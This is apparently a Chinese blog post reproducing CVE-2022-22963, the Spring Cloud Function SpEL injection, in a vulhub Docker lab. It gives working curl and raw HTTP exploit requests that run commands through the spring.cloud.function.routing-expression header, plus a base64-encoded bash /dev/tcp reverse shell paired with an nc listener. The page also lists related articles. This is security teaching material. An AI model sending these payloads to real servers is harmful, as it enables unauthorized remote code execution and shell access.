Spring Cloud Function SpEL 表达式命令注入漏洞复现及利用

最新推荐文章于 2023-10-27 22:55:25 发布
最新推荐文章于 2023-10-27 22:55:25 发布
阅读量968 收藏 1
点赞数 3
文章标签: spring cloud 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Tauil/article/details/125996735
版权

漏洞原理

当properties中配置spring.cloud.function.definition=functionRouter时,会触发RoutingFunction逻辑,在Spring Cloud Function中,RoutingFunction类的 apply 方法会将请求头中的spring.cloud.function.routing-expression参数作为 SpEL 表达式进行处理,从而造成 SpEL 表达式注入漏洞。

Spring Cloud Function SpEL 表达式命令注入漏洞复现

打开vulhub,输入命令

cd spring/CVE-2022-22963
sudo docker-compose up -d
sudo docker-compose ps

可以看到端口设置在8080

  • 终端输入
curl -v 'http://靶机IP:8080/functionRouter' -H "Content-Type: text/plain" -H 'spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/hacker")' --data 1111
  • 或者打开burpsuite进行抓包,再发送以下数据包:
POST /functionRouter HTTP/1.1

Host: 靶机IP:8080

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/hacker")

Content-Type: text/plain

Content-Length: 0

在这里插入图片描述

在源码中可以看到,未修改前的代码中spring.cloud.function.routing-expression参数被functionFromExpression接口中的getValue进行处理,该方法使用了StandardEvaluationContext来进行解析SeEL表达式,从而形成了注入漏洞

在这里插入图片描述

利用Spring Cloud Function SpEL 表达式命令注入漏洞进行反弹shell连接

另启一个终端,再终端中输入

nc -lvvp 4444

将以下内容进行base64编码,获得base64编码值

bash -i >& /dev/tcp/攻击机IP/4444 0>&1

回到原来终端,输入

curl -v 'http://靶机IP:8080/functionRouter' -H "Content-Type: text/plain" -H 'spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,base64编码值}|{base64,-d}|{bash,-i}")' --data 1111

成功连接上靶机

在这里插入图片描述

Tauil
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2022-22963 Spring Cloud Function SPEL表达式注入漏洞复现
afei001
03-31 4186
SpringCloudFunctionSpringBoot开发的一个Servless中间件(FAAS),支持基于SpEL的函数式动态路由。当Spring Cloud Function 启用动态路由functionRouter时, HTTP请求头 spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。
SPRING CLOUD FUNCTION SPEL表达式注入漏洞测试服务端程序
03-30
用于Spring Cloud Function SPEL表达式注入漏洞测试环境搭建,是编译好的服务端程序,命令号java -jar *.jar运行即可,服务端运行在127.0.0.1:8080端口
Spring Cloud Function Spel表达式注入
weixin_45794666的博客
04-05 6030
Spring Cloud Function Spel表达式注入 漏洞概述 Spring Cloud Function 是基于Spring Boot 的函数计算框架(FaaS),支持基于SpEL的函数式动态路由。在特定配置下,3 <= 版本 <= 3.2.2( commit dc5128b 之前)存在SpEL表达式执行导致的RCE。 环境搭建 在IDEA中选择新建项目,然后选择Spring Initializr,输入随机项目名称,然后选择java版本和jdk版本后点击下一步。 选择Spring
Spring Cloud Function SPEL表达式注入漏洞复现
xhwfa的博客
04-20 3580
漏洞编号:CVE-2022-22963 一、漏洞简述 Spring Cloud Function 是基于Spring Boot的函数计算框架(FaaS),该项目提供了一个通用的模型,用于在各种平台上部署基于函数的软件,包括像Amazon AWS Lambda 这样的 FaaS(函数即服务,function as a service)平台。它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。 在版本3.0.0到当前最新版本3.2.2(commit dc5128b),默
漏洞复现Spring Cloud Function SPEL表达式注入漏洞(cve-2022-22963)
Hi~ 土拨鼠
04-01 1503
文章目录1、复现环境2、构造POC3、在vps上开启监听4、执行POC,成功反弹shell 1、复现环境 本文是在vulfocus在线环境进行的复现:http://vulfocus.io/ 2、构造POC 由描述可知需要构造请求包,添加spring.cloud.function.routing-expression参数,内容会被作为spel表达式解析 由于java中不支持管道符和特殊符号,所以将反弹shell的命令用base64进行编码处理 spring.cloud.function.routing-ex
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
最新发布
12-26
本文将详细探讨一个重要的安全问题——Spring Cloud Gateway Actuator API 的SpELSpring Expression Language)表达式注入漏洞(CVE-2022-22947),该漏洞可能导致命令执行,对系统安全构成严重威胁。首先,我们...
SpringCloud Function SpEL注入漏洞分析(CVE-2022-22963).doc
07-08
在分析该漏洞时,我们可以看到,SpEL 注入漏洞的成因是由于 SpringCloud Function 的一个特性,即可以使用 SpEL 表达式来定义函数的路由规则。当攻击者可以控制 SpEL 表达式时,就可以 Inject 恶意代码,从而导致...
Spring cloud function SpEL RCE批量检测脚本,反弹shell脚本
03-30
Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。 批量检测脚本:python Spel_RCE_POC.py url.txt 反弹...
Spring组件开发模式支持SPEL表达式
08-26
Spring组件开发模式支持SPEL表达式 Spring框架作为Java企业级应用程序的主流框架,提供了强大的组件开发模式,支持SPELSpring Expression Language)表达式,使得开发者能够更加灵活地使用表达式来实现业务逻辑。...
Spring Cloud Function SpEL表达式命令注入(CVE-2022-22963)漏洞复现
weixin_54786196的博客
10-27 340
Spring Cloud Function是一个用于构建和部署基于函数的微服务的框架。它使用SpEL表达式来处理函数的输入和输出。SpEL是一种强大的表达式语言,它允许开发人员在运行时动态地计算表达式。由于Spring CloudFunction中RoutingFunction类的apply方法将请求头中的"spring.cloud.function.routing-expression"参数作为Spel表达式进行处理,造成了Spel表达式注入漏洞,当使用路由功能时,攻击者可利用漏洞远程执行任意代码。
Spring Cloud Function SpEL 漏洞复现
m0_67390788的博客
08-24 288
Spring Cloud Function SpEL表达式注入漏洞,远程攻击者在无需认证的情况下,构造特定的数据包,在header中添加"spring.cloud.function.routing-expression"参数并携带SpEL表达式,成功利用漏洞可实现任意代码执行。如果程序使用Maven打包,可以通过排查项目的pom.xml文件中是否引入spring-cloud-function相关依赖,确认其版本是否在受影响范围内。建议等待官方发布修复版本或自行下载修复代码进行手动编译。
Spring Cloud Function SpEL表达式注入漏洞复现
04-06 3973
漏洞描述 Spring Cloud Function 是基于Spring Boot 的函数计算框架(FaaS),当其启用动态路由functionRouter时, HTTP请求头 spring.cloud.function.routing-expression参数存在SPEL表达式注入漏洞,攻击者可通过该漏洞进行远程命令执行。 影响版本 Spring Cloud Function SPEL表达式注入漏洞影响范围: 3 <= spring-cloud-function-context <= 3.2.
安全漏洞通告|Spring Cloud Function SPEL表达式注入漏洞解决方案
bocco的博客
03-28 1764
近日,安全狗应急响应中心监测到Spring Cloud官方修复了一个Spring Cloud Function中的SPEL表达式注入漏洞
漏洞复现-CVE-2022-22963-Spring Cloud Function SpEL RCE 远程代码执行漏洞
m0_65454485的博客
08-08 1809
漏洞复现-CVE-2022-22963-Spring Cloud Function SpEL RCE 远程代码执行漏洞
突发!Spring Cloud 爆高危漏洞。。赶紧修复!!
Java技术栈,分享最主流的Java技术
03-03 1178
点击关注公众号,Java干货及时送达Spring Cloud 突发漏洞大家好,我是栈长。Log4j2 的核弹级漏洞刚告一段落,Spring Cloud Gateway 又突发高危漏洞,又得...
【Nday】Spring-Cloud-SpEL-RCE漏洞复现
wwang135的博客
03-30 4457
Spring-Cloud-SpEL-RCE漏洞复现
SpringBoot SpEL表达式注入漏洞-分析与复现
06-02
SpringBoot SpEL表达式注入漏洞是一种常见的安全漏洞,攻击者可以利用漏洞在应用中执行恶意代码,从而导致应用被攻击。下面我将对该漏洞进行分析与复现。 一、漏洞分析 SpringBoot中的SpELSpring Expression Language)是一种基于表达式的语言,用于在运行时动态地计算值或执行逻辑。SpEL表达式可以用于访问对象的属性、调用对象的方法、进行条件判断等操作。在SpringBoot中,SpEL表达式可以用于注解中的属性值、配置文件中的属性值等场景。 在SpEL表达式中,可以使用一些特殊的语法来引用Bean对象或调用Bean对象的方法。例如,可以使用`#{beanName.methodName()}`的语法来调用Bean对象的方法。如果在SpEL表达式中使用了未经过滤的用户输入,就会存在SpEL表达式注入漏洞。 攻击者可以通过构造恶意的SpEL表达式,将其注入到应用中,从而执行恶意代码。例如,可以将`#{T(java.lang.Runtime).getRuntime().exec('calc')}`注入到应用中,从而在受害者机器上执行计算器程序。 二、漏洞复现 下面我将通过一个简单的漏洞复现来说明SpEL表达式注入漏洞的危害性。 1. 创建一个SpringBoot应用 首先,我们需要创建一个SpringBoot应用。可以使用Spring Initializr来快速创建一个基本的SpringBoot应用。 2. 添加注解 在创建好的SpringBoot应用中,我们可以添加一个Controller类,并在其中添加一个RequestMapping注解。在RequestMapping注解中,我们可以使用SpEL表达式来引用Bean对象或调用Bean对象的方法。 ```java @RestController public class MyController { @RequestMapping("/test") public String test() { return "hello world"; } @RequestMapping(value = "/{name}", method = RequestMethod.GET) public String sayHello(@PathVariable("name") String name) { return "Hello " + name + "!"; } @RequestMapping(value = "/spel", method = RequestMethod.GET) public String spel() { String expression = "#{T(java.lang.Runtime).getRuntime().exec('calc')}"; ExpressionParser parser = new SpelExpressionParser(); Expression exp = parser.parseExpression(expression); return exp.getValue().toString(); } } ``` 在上述代码中,我们在/spel接口中使用了SpEL表达式来调用Runtime.getRuntime().exec方法,从而执行计算器程序。 3. 启动应用 启动应用后,访问/spel接口,可以看到计算器程序被成功执行。 4. 防范措施 为了防范SpEL表达式注入漏洞,我们可以采取以下措施: 1. 对用户输入进行过滤和验证,避免未经过滤的用户输入被注入SpEL表达式中。 2. 尽量避免在注解或配置文件中使用SpEL表达式。 3. 对于必须使用SpEL表达式的场景,可以对SpEL表达式进行白名单过滤,只允许特定的SpEL表达式被执行。 4. 在应用中禁用动态表达式功能,避免SpEL表达式被执行。 5. 总结 SpEL表达式注入漏洞是一种常见的安全漏洞,攻击者可以利用漏洞在应用中执行恶意代码。为了防范该漏洞,我们需要对用户输入进行过滤和验证,避免未经过滤的用户输入被注入SpEL表达式中。同时,尽量避免在注解或配置文件中使用SpEL表达式,对于必须使用SpEL表达式的场景,可以对SpEL表达式进行白名单过滤,只允许特定的SpEL表达式被执行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值